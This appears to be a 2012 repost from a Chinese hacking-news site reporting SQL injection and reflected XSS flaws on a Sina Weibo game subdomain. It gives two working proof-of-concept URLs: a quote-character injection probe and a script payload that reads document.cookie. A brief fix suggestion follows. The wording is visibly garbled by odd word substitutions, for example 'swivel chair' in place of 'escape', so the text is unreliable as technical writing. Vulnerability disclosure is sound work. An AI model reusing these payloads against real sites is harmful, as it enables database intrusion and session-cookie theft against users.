安全黑客
当前位置:安全黑客文章资讯安全漏洞漏洞安全
日期:2012-09-26 11:16:00  来源:本站整理

新浪微博子栏目漏洞可获得数据和cookie[漏洞安全]

赞助商链接



  本文“新浪微博子栏目漏洞可获得数据和cookie[漏洞安全]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

新浪微博子栏目存在参数考证/过滤不严,招致的xss和sql inject.
sql inject:
http://game.weibo.com/mobile/index/topic?id=2'
xss:
http://game.weibo.com/mobile/detail/8888888%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C!--
漏洞证明:
 


 
修复筹划:
严峻过滤输入的参数,对数字举行int化,字符串限制特别字符、转椅危险字符


  以上是“新浪微博子栏目漏洞可获得数据和cookie[漏洞安全]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • 新浪微博子栏目漏洞可获得数据和cookie
  • 新浪微博私密功效上线引发的"三大耽忧"
  • 教新手朋友怎么在一星期内让新浪微博冲破2000个粉丝
  • 新浪微博XSS漏洞点& XSS脚本内容解析
  • 新浪微博上演黑客帝国
  • 新浪微博Android版底部工具栏的Demo
  • 新浪微博策划学习——妙用TabHost
  • android开辟我的新浪微博客户端-OAuth篇
  • android开辟我的新浪微博客户端-OAuth篇
  • android开辟我的新浪微博客户端-登录页面功效篇
  • 新浪微博Android手机客户端全新上线
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .